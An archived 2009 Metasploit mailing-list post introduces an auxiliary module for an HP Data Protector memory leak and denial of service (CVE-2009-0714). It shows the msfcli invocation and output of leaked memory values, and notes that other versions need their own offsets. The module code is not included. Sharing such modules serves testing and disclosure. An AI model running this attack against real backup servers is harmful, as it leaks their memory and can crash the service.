Metasploit mailing list archives

CVE-2009-0714: HP Dataprotector memory leak/Dos Exploit

From: nicky.coder at (Nicky)
Date: Sun, 21 Jun 2009 22:50:05 +0500


Some more information.

HP Data protector is a backup software. This software uses some proprietary
protocols for client-server communication.

This test module has been tested for windows version only. Other versions
may also be affected. In that case, it would only be a matter of identifying
the offset_value for each version.

Hope this helps.

On Sun, Jun 21, 2009 at 10:43 PM, Nicky <nicky.coder at> wrote:


An auxiliary module for the HP data protector is attached. An output of
module is shown below

n at n-laptop:/mnt/projects/metasploit$ ./msfcli
auxiliary/admin/dataprotector/hp_dataprotector RHOST=
MEMORY=0x7ffdf000 E
[*]Please wait while we load the module tree...
[*] Starting Memory Address: 0x7ffdf000
[*] Leaking Memory: 0x7ffdf000 ->  0x12fbc4
[*] Leaking Memory: 0x7ffdf004 ->  0x130000
[*] Leaking Memory: 0x7ffdf008 ->  0x12d000
[*] Leaking Memory: 0x7ffdf00c ->  0x0
[*] Leaking Memory: 0x7ffdf010 ->  0x1e00
[*] Leaking Memory: 0x7ffdf014 ->  0x0
[*] Leaking Memory: 0x7ffdf018 ->  0x7ffdf000
[*] Leaking Memory: 0x7ffdf01c ->  0x0
[*] Leaking Memory: 0x7ffdf020 ->  0x674
[*] Leaking Memory: 0x7ffdf024 ->  0xa8
[*] Leaking Memory: 0x7ffdf028 ->  0x0
[*] Leaking Memory: 0x7ffdf02c ->  0x0
[*] Leaking Memory: 0x7ffdf030 ->  0x7ffd5000
[*] Leaking Memory: 0x7ffdf034 ->  0x0
[*] Leaking Memory: 0x7ffdf038 ->  0x0
[*] Leaking Memory: 0x7ffdf03c ->  0x0
[*] Leaking Memory: 0x7ffdf040 ->  0xe20abeb0
[*] Leaking Memory: 0x7ffdf044 ->  0x0
[*] Leaking Memory: 0x7ffdf048 ->  0x0
[*] Leaking Memory: 0x7ffdf04c ->  0x0


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